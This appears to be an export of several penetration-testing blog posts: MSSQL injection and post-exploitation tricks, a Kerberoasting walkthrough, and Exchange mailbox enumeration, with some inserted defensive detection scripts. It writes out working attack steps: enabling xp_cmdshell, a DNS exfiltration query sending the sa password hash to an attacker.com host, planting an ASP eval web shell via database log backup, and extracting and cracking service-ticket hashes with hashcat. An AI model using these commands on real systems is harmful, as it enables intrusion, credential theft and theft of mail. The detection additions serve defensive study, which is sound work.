<p>Concatenate multiple rows into one value<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="comment">-- get the table's column names</span></div><div class="line"><span class="keyword">DECLARE</span> @<span class="keyword">col</span> <span class="built_in">varchar</span>(<span class="number">1000</span>)=<span class="string">''</span>;</div><div class="line"><span class="keyword">SELECT</span> @<span class="keyword">col</span> = @<span class="keyword">col</span> + <span class="keyword">name</span> + <span class="string">','</span> <span class="keyword">FROM</span> SysColumns <span class="keyword">WHERE</span> <span class="keyword">id</span>=Object_Id(<span class="string">'Users'</span>);</div><div class="line"><span class="comment">--PRINT RTRIM(@col);</span></div></pre></td></tr></table></figure></p>
<p>SELECT ','+Name FROM SysColumns WHERE id=Object_Id('Users') FOR XML PATH('')</p>
<p>List the column names of table<br><code>SELECT COL_NAME(OBJECT_ID('table'), 1)</code></p>
<p>Guess column values<br>ascii(substring(COL_NAME(OBJECT_ID('Users'),1),1,1)) > 0 // which column, which character</p>
<p>UNICODE(SUBSTRING((SELECT%0a ISNULL(CAST(LTRIM(STR(LEN(COL_NAME(OBJECT_ID('table'),1)))) AS NVARCHAR(4000)),CHAR(32))),1,1))>48</p>
<h3 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>Command execution</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">EXEC sp_configure '<span class="keyword">show</span> <span class="keyword">advanced</span> options<span class="string">',1 // allow changing advanced options</span></div><div class="line"><span class="string">EXEC sp_configure '</span>xp_cmdshell<span class="string">',1 // enable the xp_cmdshell extended procedure</span></div><div class="line"><span class="string">EXEC master..dbo.xp_cmdshell '</span>whoami<span class="string">'</span></div></pre></td></tr></table></figure>
<h3 id="Public-权限列目录"><a href="#Public-权限列目录" class="headerlink" title="Public 权限列目录"></a>Listing directories with Public permission</h3><p>Get the directory names under C:<br><code>EXEC master..xp_dirtree 'c:/',1</code></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">IF OBJECT_ID('tempdb..##DirectoryTree') IS NOT NULL</div><div class="line"> <span class="keyword">DROP</span> <span class="keyword">TABLE</span> ##DirectoryTree;</div><div class="line"></div><div class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> ##DirectoryTree (</div><div class="line"> <span class="keyword">id</span> <span class="built_in">int</span> <span class="keyword">IDENTITY</span>(<span class="number">1</span>,<span class="number">1</span>),</div><div class="line"> subdirectory <span class="keyword">nvarchar</span>(<span class="number">512</span>),</div><div class="line"> <span class="keyword">depth</span> <span class="built_in">int</span>,</div><div class="line"> isfile <span class="built_in">bit</span>);</div><div class="line"></div><div class="line"><span class="keyword">INSERT</span> ##DirectoryTree (subdirectory,<span class="keyword">depth</span>,isfile) EXEC master..xp_dirtree <span class="string">'c:/'</span>,<span class="number">1</span>,<span class="number">1</span>;</div></pre></td></tr></table></figure>
<p>Exfiltrating data over DNS</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">DECLARE</span> @host <span class="built_in">varchar</span>(<span class="number">1024</span>);</div><div class="line"><span class="keyword">SELECT</span> @host=(<span class="keyword">SELECT</span> TOP <span class="number">1</span> master.dbo.fn_varbintohexstr(password_hash) <span class="keyword">FROM</span> sys.sql_logins <span class="keyword">WHERE</span> <span class="keyword">name</span>=<span class="string">'sa'</span>)+<span class="string">'.attacker.com'</span>;</div><div class="line">EXEC master..xp_dirtree "\\'+@host+'\foobar$";</div></pre></td></tr></table></figure>
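<p>A detection-side counterpart to both DNS exfiltration variants above (MySQL LOAD_FILE with hex(user()) and MSSQL xp_dirtree with fn_varbintohexstr), added here and not from the original post: it scans dnschef-style log lines for query labels that are long hex strings and decodes them. The log lines are constructed; the domain, client addresses and the hash-like label are placeholders.</p>

```python
"""Flag DNS query names that carry hex-encoded data.
Added example; log lines, addresses and domain are constructed."""
import re
from typing import Optional, Tuple

# dnschef-style line: "[HH:MM:SS] <client>: proxying the response of type 'A' for <qname>"
LOG_RE = re.compile(r"^\[(?P<time>[\d:]+)\] (?P<client>[\d.]+): .*? for (?P<qname>\S+)$")
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")

def analyze_label(label: str, min_len: int = 16) -> Optional[Tuple[str, str]]:
    """Classify one DNS label. Returns ("text", decoded) when it is a long hex
    string decoding to printable ASCII (the hex(user()) case), ("binary", hex)
    when it is hex but not printable (a hashed password from fn_varbintohexstr),
    and None for ordinary labels."""
    if label.lower().startswith("0x"):          # T-SQL hex strings keep the 0x prefix
        label = label[2:]
    if len(label) < min_len or len(label) % 2 or not HEX_RE.match(label):
        return None
    raw = bytes.fromhex(label)
    if all(0x20 <= b < 0x7F for b in raw):
        return ("text", raw.decode("ascii"))
    return ("binary", raw.hex())

def suspicious_qname(qname: str) -> Optional[Tuple[str, str]]:
    """First hex-carrying label of a query name, or None."""
    for label in qname.rstrip(".").split("."):
        hit = analyze_label(label)
        if hit:
            return hit
    return None

def scan_dnschef_log(lines) -> list:
    """Return one dict per line whose query name carries encoded data."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        hit = suspicious_qname(m["qname"])
        if hit:
            hits.append({"client": m["client"], "qname": m["qname"],
                         "kind": hit[0], "data": hit[1]})
    return hits

# Constructed sample log (RFC 5737 addresses; example.com stands in for the real domain).
SAMPLE_LOG = [
    "[22:29:07] 192.0.2.10: proxying the response of type 'A' for 726F6F74406C6F63616C686F7374.ns1.example.com",
    "[22:29:09] 192.0.2.10: proxying the response of type 'A' for www.example.com",
    "[22:31:40] 198.51.100.7: proxying the response of type 'A' for 0x0200A1B2C3D4E5F60718293A4B5C6D7E8F90.ns1.example.com",
]

if __name__ == "__main__":
    for hit in scan_dnschef_log(SAMPLE_LOG):
        print(hit)
```

The same label check applies to resolver query logs from the database host, where the outbound lookup for an attacker-controlled zone is itself the indicator.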
<h3 id="备份数据库"><a href="#备份数据库" class="headerlink" title="备份数据库"></a>Back up the database</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">BACKUP</span> <span class="keyword">DATABASE</span> database_name </div><div class="line"> <span class="keyword">TO</span> DISK = <span class="string">'D:\backup.bak'</span></div></pre></td></tr></table></figure>
<h3 id="备份还原-1"><a href="#备份还原-1" class="headerlink" title="备份还原"></a>Backup and restore</h3><p>ST1 Create the database.<br>ST2 Return a result set listing the database and log files contained in the backup set.<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">RESTORE</span> FILELISTONLY</div><div class="line"> <span class="keyword">FROM</span> DISK = <span class="string">' D:\Hs.bak '</span></div></pre></td></tr></table></figure></p>
<p>ST3 Restore, specifying the physical file names and paths of the database.<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">RESTORE</span> <span class="keyword">DATABASE</span> database_name </div><div class="line"> <span class="keyword">FROM</span> DISK = <span class="string">'D:\Hs.bak'</span></div><div class="line"><span class="keyword">WITH</span> <span class="keyword">REPLACE</span>,</div><div class="line"><span class="keyword">MOVE</span> <span class="string">'HealthSchoolMIS_Data'</span> <span class="keyword">TO</span> <span class="string">'D:\DATA\HealthSchoolMIS_Data.MDF'</span>,</div><div class="line"><span class="keyword">MOVE</span> <span class="string">'HealthSchoolMIS_Log'</span> <span class="keyword">TO</span> <span class="string">'D:\DATA\HealthSchoolMIS_Log.LDF'</span></div></pre></td></tr></table></figure></p>
<h3 id="数据库备份shell"><a href="#数据库备份shell" class="headerlink" title="数据库备份shell"></a>Writing a shell via database backup</h3><p>First take a full backup<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">alter</span> <span class="keyword">database</span> database_name <span class="keyword">set</span> <span class="keyword">RECOVERY</span> <span class="keyword">FULL</span> // the database must be fully backed up once first</div><div class="line"><span class="keyword">backup</span> <span class="keyword">database</span> database_name <span class="keyword">to</span> disk = <span class="string">'d:\1.asp'</span></div><div class="line"><span class="keyword">BACKUP</span> <span class="keyword">LOG</span> cannot be performed because there <span class="keyword">is</span> <span class="keyword">no</span> <span class="keyword">current</span> <span class="keyword">database</span> backup.</div></pre></td></tr></table></figure></p>
<p>Create the cmd table and insert the value<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">create</span> <span class="keyword">table</span> cmd (a image)</div><div class="line"><span class="keyword">insert</span> <span class="keyword">into</span> cmd (a) <span class="keyword">values</span> (<span class="number">0x3C256576616C20726571756573742822732229253E</span>)</div><div class="line"><span class="number">0x3C256576616C20726571756573742822732229253E</span> -> <%eval request(<span class="string">"s"</span>)%></div></pre></td></tr></table></figure></p>
<p>Take an incremental (log) backup<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">backup</span> <span class="keyword">log</span> database_name </div><div class="line"> <span class="keyword">to</span> disk = <span class="string">'c:\1.asp'</span></div></pre></td></tr></table></figure></p>
<h3 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>File upload</h3><p>Insert the data into a local table<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">create</span> <span class="keyword">table</span> temp (<span class="keyword">data</span> <span class="built_in">text</span>)</div><div class="line"><span class="keyword">bulk</span> <span class="keyword">insert</span> temp <span class="keyword">from</span> <span class="string">'d:\test.txt'</span> <span class="keyword">with</span> (codepage=<span class="string">'RAW'</span>)</div></pre></td></tr></table></figure></p>
<p>bcp {dbtable | query} {in | out | queryout | format} datafile<br>database table dbtable -> in/out<br>query -> queryout</p>
<p>Connect remotely to the target database and export to a file<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">EXEC master..xp_cmdshell 'bcp "<span class="keyword">SELECT</span> * <span class="keyword">FROM</span> test.dbo.temp<span class="string">" queryout d:\tset1.txt -c -S"</span>服务器地址<span class="string">" -U"</span>username<span class="string">" -P"</span><span class="keyword">password</span><span class="string">"'</span></div></pre></td></tr></table></figure></p>
<p>From inside the database<br>Export the contents of the temp table in the test database to a file (binary files work too)<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">EXEC master..xp_cmdshell 'bcp test.dbo.temp out d:\tset1.txt -c -T' </div><div class="line">EXEC master..xp_cmdshell 'bcp "<span class="keyword">select</span> * <span class="keyword">from</span> test.dbo.temp<span class="string">" queryout "</span>d:\test.exe<span class="string">" -c -T'</span></div></pre></td></tr></table></figure></p>
<h2 id="Oracle"><a href="#Oracle" class="headerlink" title="Oracle"></a>Oracle</h2>]]></content>
</entry>
<entry>
<title><![CDATA[SPNs]]></title>
<url>/2017/11/01/SPNs/</url>
<content type="html"><![CDATA[<p>First, an overview of the Kerberos authentication protocol</p>
<p>Kerberos Overview & Communication Process:</p>
<p><img src="https://www.ibm.com/developerworks/cn/data/library/techarticles/dm-0809govindarajan/image001.gif" alt=""></p>
<p>The KDC (Key Distribution Center) consists of two services: the Authentication Server (AS) and the Ticket Granting Server (TGS).</p>
<p>User logs on with username & password.</p>
<p>Client authentication</p>
<ol>
<li>The client sends the user ID to the AS as a cleartext message.</li>
<li>The AS returns a session key encrypted with the client user's password, and a TGT encrypted with the krbtgt password.</li>
<li>The client decrypts the message with the user's password to obtain the session key, which is used for further communication with the TGS.</li>
</ol>
<p>Client service authorization</p>
<ol>
<li>The client sends the TGT and an authenticator encrypted with the Client/TGS session key.</li>
<li>The TGS decrypts the TGT to obtain the session key and uses it to decrypt the authenticator; if the IDs match, it returns a client-to-server ticket encrypted with the service's password and a client/server session key (session key 2) encrypted with the Client/TGS session key.</li>
</ol>
<p>Client service request</p>
<ol>
<li>The client sends a new authenticator encrypted with session key 2 together with the service ticket.</li>
<li>The server decrypts the service ticket with its own password and provides the service.</li>
</ol>
<h3 id="Service-Principal-Names"><a href="#Service-Principal-Names" class="headerlink" title="Service Principal Names"></a>Service Principal Names</h3><p>A Service Principal Name (SPN) is a unique identifier for a service instance. Kerberos authentication uses SPNs to associate a service instance with a service logon account. Configuring an SPN for the MSSQL service serves as the example.<br><a href="https://technet.microsoft.com/zh-cn/library/bb735885.aspx" target="_blank" rel="external">https://technet.microsoft.com/zh-cn/library/bb735885.aspx</a></p>
<a id="more"></a>
<p>S1. Register an SPN for the SQL Server service account.</p>
<p>Manual registration<br>setspn -A MSSQLSvc/myhost.redmond.microsoft.com:1433 accountname<br>For a named instance<br>setspn -A MSSQLSvc/myhost.redmond.microsoft.com/instancename accountname </p>
<p>View the SPNs registered to a user<br><code>setspn -L ruos\sql-service</code></p>
<p>View the user's attributes with ADSI Edit (adsiedit.msc)</p>
<p><img src="https://i.imgur.com/bayB8a4.png" alt=""></p>
<p>S2. Grant the user the "log on as a service" right in AD.</p>
<p>GPO_name\Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment<br>Log on as a service</p>
<p><img src="https://i.imgur.com/8o7zha7.png" alt=""></p>
<p>S3. Change the SQL Server service account to the domain user account.</p>
<h3 id="暴力破解Kerberos-TGS-Tickets"><a href="#暴力破解Kerberos-TGS-Tickets" class="headerlink" title="Brute-forcing Kerberos TGS Tickets"></a>Brute-forcing Kerberos TGS Tickets</h3><p>When the encryption type is RC4_HMAC_MD5, the TGS-REP in step four of the Kerberos protocol returns a ticket encrypted with the service account's NTLM password hash.</p>
<p>S1. SPN scan</p>
<p><code>setspn -T domain -q */*</code></p>
<p>Or<br><a href="https://github.com/PyroTek3/PowerShell-AD-Recon/" target="_blank" rel="external">https://github.com/PyroTek3/PowerShell-AD-Recon/</a></p>
<p><img src="https://i.imgur.com/56AHj7q.png" alt=""></p>
<p>S2. Request Kerberos tickets for the SPN<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">PS C:\> <span class="built_in">Add-Type</span> -AssemblyName System.IdentityModel</div><div class="line">PS C:\> <span class="built_in">New-Object</span> System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList <span class="string">"MSSQLSvc/WEBTST01.ruos.org/SQLEXPRESS"</span></div></pre></td></tr></table></figure></p>
<p>S3. View and export the tickets</p>
<p><img src="https://i.imgur.com/qvvPXcA.png" alt=""></p>
<blockquote>
<p>In the default configuration the encryption type is aes256_hmac, which tgsrepcrack cannot crack; the encryption type can be set to RC4_HMAC_MD5 in the server's group policy.<br>GPO_name\Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options<br>Network security: Configure encryption types allowed for Kerberos</p>
</blockquote>
<p>S4. Offline cracking</p>
<p>tgsrepcrack (RC4_HMAC_MD5 only), or save the hash and crack it with hashcat.</p>
<p><img src="https://i.imgur.com/o8WPRlS.png" alt=""></p>
<p>S1. Export the hash (for other encryption types)<br>GetUserSPNs.py -request -outputfile hash.txt -dc-ip 192.168.6.2 ruos.org/user2<br>Or export it from the ticket: kirbi2john.py 1-40a00000-user2@MSSQLSvc~WEBTST01.ruos.org~SQLEXPRESS-RUOS.ORG.kirbi<br>S2. hashcat64.exe -m 13100 hash.txt example.dict --force</p>
<p><a href="https://github.com/nidem/kerberoast" target="_blank" rel="external">https://github.com/nidem/kerberoast</a><br><a href="https://github.com/coresecurity/impacket" target="_blank" rel="external">https://github.com/coresecurity/impacket</a><br><a href="https://github.com/nidem/kerberoast/blob/master/kirbi2john.py" target="_blank" rel="external">https://github.com/nidem/kerberoast/blob/master/kirbi2john.py</a></p>
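<p>Added example, not code from the original post: two defender-side checks for the RC4 weakness this section relies on. The first reads Security event 4769 on a domain controller and reports RC4 service tickets issued for user service accounts, grouped by the requesting account (the SPN sweep in S1 shows up as one requester hitting many services); the second lists SPN accounts whose msDS-SupportedEncryptionTypes still permits RC4. The RSAT ActiveDirectory module, the event count and the sweep threshold are assumptions.</p>

```powershell
# Added example (not from the original post). Run in an elevated PowerShell on a
# domain controller; Get-Rc4CapableSpnAccounts needs the ActiveDirectory module.
# Thresholds and parameter defaults are assumptions.

function Get-Rc4TgsRequests {
    # Scans event 4769 (Kerberos service ticket request) and returns, per
    # requesting account, the user service accounts for which RC4 tickets were issued.
    param(
        [int]$MaxEvents = 10000,
        [int]$SweepThreshold = 5   # distinct service accounts per requester before flagging a sweep
    )
    $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4769 } `
        -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    $hits = foreach ($e in $events) {
        $xml = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        # TicketEncryptionType: 0x17 = RC4_HMAC_MD5, 0x12 = AES256, 0x11 = AES128
        if ($d['TicketEncryptionType'] -ne '0x17') { continue }
        # only a successful request (Status 0x0) returns a ticket
        if ($d['Status'] -ne '0x0') { continue }
        # krbtgt and computer accounts (name ends in $) have random passwords
        if ($d['ServiceName'] -eq 'krbtgt' -or $d['ServiceName'] -like '*$') { continue }
        [pscustomobject]@{
            Time      = $e.TimeCreated
            Requester = $d['TargetUserName']
            Service   = $d['ServiceName']
            ClientIp  = $d['IpAddress']
        }
    }
    $hits | Group-Object Requester | ForEach-Object {
        $services = @($_.Group.Service | Sort-Object -Unique)
        [pscustomobject]@{
            Requester     = $_.Name
            RequestCount  = $_.Count
            Services      = ($services -join ',')
            # one requester asking for many distinct service accounts is the
            # signature of the SPN scan plus bulk ticket request above
            PossibleSweep = ($services.Count -ge $SweepThreshold)
        }
    }
}

function Get-Rc4CapableSpnAccounts {
    # Lists user accounts with SPNs whose msDS-SupportedEncryptionTypes still
    # includes RC4 (bit 0x4) or is unset, which Windows treats as RC4-capable.
    Import-Module ActiveDirectory
    Get-ADUser -Filter 'ServicePrincipalName -like "*"' `
        -Properties ServicePrincipalName, 'msDS-SupportedEncryptionTypes' |
    ForEach-Object {
        $enc = $_.'msDS-SupportedEncryptionTypes'
        [pscustomobject]@{
            Account    = $_.SamAccountName
            SPNs       = ($_.ServicePrincipalName -join ',')
            EncTypes   = $enc
            # DES bits 0x1/0x2, RC4 0x4, AES128 0x8, AES256 0x10
            Rc4Allowed = (($null -eq $enc) -or (($enc -band 0x4) -ne 0))
            AesOnly    = (($null -ne $enc) -and (($enc -band 0x18) -ne 0) -and (($enc -band 0x7) -eq 0))
        }
    }
}
```

The GPO mentioned above controls what the KDC will issue; an account that still advertises RC4 in Rc4Allowed gets RC4 tickets regardless of how strong its own password policy is, so the two checks are complementary.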
<h3 id="其他"><a href="#其他" class="headerlink" title="Other"></a>Other</h3><p><a href="https://msdn.microsoft.com/zh-cn/library/windows/apps/dn194200(v=sql.110).aspx" target="_blank" rel="external">https://msdn.microsoft.com/zh-cn/library/windows/apps/dn194200(v=sql.110).aspx</a></p>
]]></content>
</entry>
<entry>
<title><![CDATA[Domain Penetration: Exchange Server]]></title>
<url>/2017/07/27/exchange%20server/</url>
<content type="html"><![CDATA[<p><img src="https://i-technet.sec.s-msft.com/Areas/Epx/Themes/TechNet/Content/Images/BrandLogoExchange.png?v=636437933426396895" alt=""></p>
<blockquote>
<p>Microsoft Exchange Server is a messaging and collaboration system. It offers industry-leading scalability, high reliability, security and throughput, and many enterprises, schools and government bodies use it as their primary mail system. In an internal penetration test, control of the mail system gets you twice the result for half the effort, especially when Exchange is bound to AD.</p>
</blockquote>
<p>This article covers basic operations on Exchange mail from PowerShell; they apply equally to day-to-day administration, though they barely scratch the surface of the vast Exchange Management Shell. The environment below is Exchange Server 2013; the same applies to 2010 and other versions.</p>
<p>You can connect to the Exchange server through the Exchange Management Shell (EMS) shortcut in the Start menu; after initialization you get a PowerShell command window. If the connection fails, believe me, it is because you have not allocated enough memory: even a default Exchange installation needs at least 6 GB.</p>
<p>If everything works and you already hold domain controller privileges, let the journey begin!</p>
<a id="more"></a>
<h2 id="导出邮箱列表"><a href="#导出邮箱列表" class="headerlink" title="Export the mailbox list"></a>Export the mailbox list</h2><h4 id="查看数据库"><a href="#查看数据库" class="headerlink" title="View databases"></a>View databases</h4><p>A mailbox database is the unit of granularity at which mailboxes are created and stored. Mailbox databases are stored as Exchange database (.edb) files, on either direct-attached storage (DAS) or a storage area network (SAN). The Get-MailboxDatabase cmdlet retrieves one or more mailbox database objects from a server or the organization. For high availability there are usually at least two servers forming a DAG; the -Server parameter specifies which server to query.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>get-mailboxdatabase -Server "exchange"</div><div class="line"></div><div class="line">Name Server Recovery ReplicationType</div><div class="line">---- ------ -------- ---------------</div><div class="line">Mailbox Database 0574336487 EXCHANGE False None</div><div class="line">Mailbox Database Test01 EXCHANGE False None</div></pre></td></tr></table></figure></p>
<p>Format and filter specific properties, such as the database file path<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\>Get-MailboxDatabase -Identity 'Mailbox Database Test01' | Format-List Name,EdbFilePath,LogFolderPath</div><div class="line"></div><div class="line">Name : Mailbox Database Test01</div><div class="line">EdbFilePath : C:\Program Files\Microsoft\Exchange Server\V15\Mailbox\Mailbox Database Test01\Mailbox Database Test01.edb</div><div class="line">LogFolderPath : C:\Program Files\Microsoft\Exchange Server\V15\Mailbox\Mailbox Database Test01</div></pre></td></tr></table></figure></p>
<p>Database management location in the ECP</p>
<p><img src="http://i.imgur.com/JT1pMQf.png" alt=""></p>
<h4 id="获取组"><a href="#获取组" class="headerlink" title="Get groups"></a>Get groups</h4><p>After creating an OU (Organizational Unit) on the domain controller, groups are usually created to manage users. Querying groups is worthwhile because you will often find one simply named IT; this step is much the same as net group. The Get-DistributionGroup cmdlet queries the existing distribution groups.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-DistributionGroup</div><div class="line"></div><div class="line">Name DisplayName GroupType PrimarySmtpAddress</div><div class="line">---- ----------- --------- ------------------</div><div class="line">EXchange New OU EXchange New OU Universal ENO@ruos.org</div><div class="line">IT Security IT Security Universal, SecurityEnabled it-security@ruos.org</div></pre></td></tr></table></figure></p>
<p>View details of the IT Security distribution group<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-DistributionGroup "IT Security" | fl</div><div class="line"></div><div class="line"></div><div class="line">RunspaceId : efbb60f9-5ef1-4a8d-9b94-c3f102e576c3</div><div class="line">GroupType : Universal, SecurityEnabled</div><div class="line">SamAccountName : IT Security</div><div class="line">BypassNestedModerationEnabled : False</div><div class="line">ManagedBy : {ruos.org/Users/Administrator, ruos.org/Users/admin}</div><div class="line">MemberJoinRestriction : Closed</div><div class="line">MemberDepartRestriction : Closed</div><div class="line">...</div></pre></td></tr></table></figure></p>
<p>Export to a CSV file<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># query distribution groups</span></div><div class="line">Get-DistributionGroup | `</div><div class="line"><span class="built_in">Select-Object</span> DisplayName,Name,Alias,GroupType,WindowsEmailAddress,@{n=<span class="string">"ManagedBy"</span>;e={<span class="variable">$_</span>.ManagedBy -Join <span class="string">";"</span>}} ,OrganizationalUnit | `</div><div class="line"><span class="built_in">Export-CSV</span> test.csv -NoType</div></pre></td></tr></table></figure></p>
<h4 id="获得组成员"><a href="#获得组成员" class="headerlink" title="Get group members"></a>Get group members</h4><p>The Get-DistributionGroupMember cmdlet lists the members of an existing distribution group.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-DistributionGroupMember -Identity "ENO"</div><div class="line"></div><div class="line">Name RecipientType</div><div class="line">---- -------------</div><div class="line">Administrator UserMailbox</div><div class="line">a UserMailbox</div><div class="line">ming xiao UserMailbox</div><div class="line">user1 UserMailbox</div></pre></td></tr></table></figure></p>
<h4 id="获得用户admin(可以是域用户格式)邮箱信息"><a href="#获得用户admin(可以是域用户格式)邮箱信息" class="headerlink" title="Get mailbox information for user admin (domain user format also works)"></a>Get mailbox information for user admin (domain user format also works)</h4><p>Get user mailbox information. The steps above show roughly how to query the members of a group; next we use the Get-Mailbox cmdlet to get mailbox objects and their properties, combined with the Get-MailboxStatistics cmdlet for information about the mailbox such as its size, the number of items it contains and the last logon time.</p>
<p>Basic usage<br>Get-Mailbox | Format-Table Name,WindowsEmailAddress<br>Get-Mailbox testuser | fl * | Out-File c:\mb.txt<br>Get-Mailbox | ForEach-Object {$_.Name}</p>
<p>Get the users in an organizational unit<br>Get-Mailbox -OrganizationalUnit "New OU"<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>get-mailboxstatistics -identity admin | Select DisplayName,ItemCount,TotalItemSize,LastLogonTime</div><div class="line"></div><div class="line">DisplayName ItemCount TotalItemSize LastLogonTime</div><div class="line">----------- --------- ------------- -------------</div><div class="line">admin 11 90.88 KB (93,056 bytes) 2016/11/29 19:59:08</div></pre></td></tr></table></figure></p>
<p>View in Format-Table mode</p>
<blockquote>
<p>Use a backtick ` to continue a line; press Enter after the last line to execute.</p>
</blockquote>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># view all mailbox information</span></div><div class="line">Get-Mailbox -ResultSize Unlimited | `</div><div class="line">Get-MailboxStatistics | `</div><div class="line"><span class="built_in">Sort-Object</span> TotalItemSize -Descending | `</div><div class="line">ft DisplayName,@{label=<span class="string">"Mailbox Size (MB)"</span>;expression={<span class="variable">$_</span>.TotalItemSize.Value.ToMB()}}</div></pre></td></tr></table></figure>
<p>Export to a CSV file (this is what you want)</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$mb</span> = Get-Mailbox -ResultSize Unlimited</div><div class="line"><span class="variable">$output</span> = <span class="keyword">foreach</span>(<span class="variable">$obj</span> <span class="keyword">in</span> <span class="variable">$mb</span> ){</div><div class="line"> <span class="variable">$ms</span> = (Get-MailboxStatistics <span class="variable">$obj</span>.Identity -WarningAction SilentlyContinue )</div><div class="line"> <span class="variable">$obj</span> | <span class="built_in">Select-Object</span> DisplayName,Name,WindowsEmailAddress,OrganizationalUnit,Database,`</div><div class="line"> @{L=<span class="string">"Mailbox Size (MB)"</span>;E={ <span class="variable">$ms</span>.TotalItemSize.Value.ToMB() }},`</div><div class="line"> @{L=<span class="string">"LastLogonTime"</span>;E={ <span class="variable">$ms</span>.LastLogonTime }}</div><div class="line">}</div><div class="line"><span class="variable">$output</span> | <span class="built_in">Export-CSV</span> test.csv -NoType</div></pre></td></tr></table></figure>
<p>Or export through the ECP</p>
<p><img src="http://i.imgur.com/N1mmgDy.jpg" alt=""></p>
<h2 id="导出PST邮件"><a href="#导出PST邮件" class="headerlink" title="Export mail to PST"></a>Export mail to PST</h2><p>With the users' mailbox usage understood, the next step is to export the mailbox data to PST files for convenient local viewing and searching.<br><strong>In Exchange Server 2010 SP1 the user mailbox export feature can only be used from the EMS, and the Exchange administrator performing it must hold the "Mailbox Import Export" role.</strong></p>
<blockquote>
<p>Exchange Server 2007 can use the Export-Mailbox cmdlet</p>
</blockquote>
<p>Exporting mail takes the following steps:</p>
<ul>
<li>Step1 Grant the user export permission</li>
<li>Step2 Export the mail</li>
<li>Step3 View and remove export requests</li>
</ul>
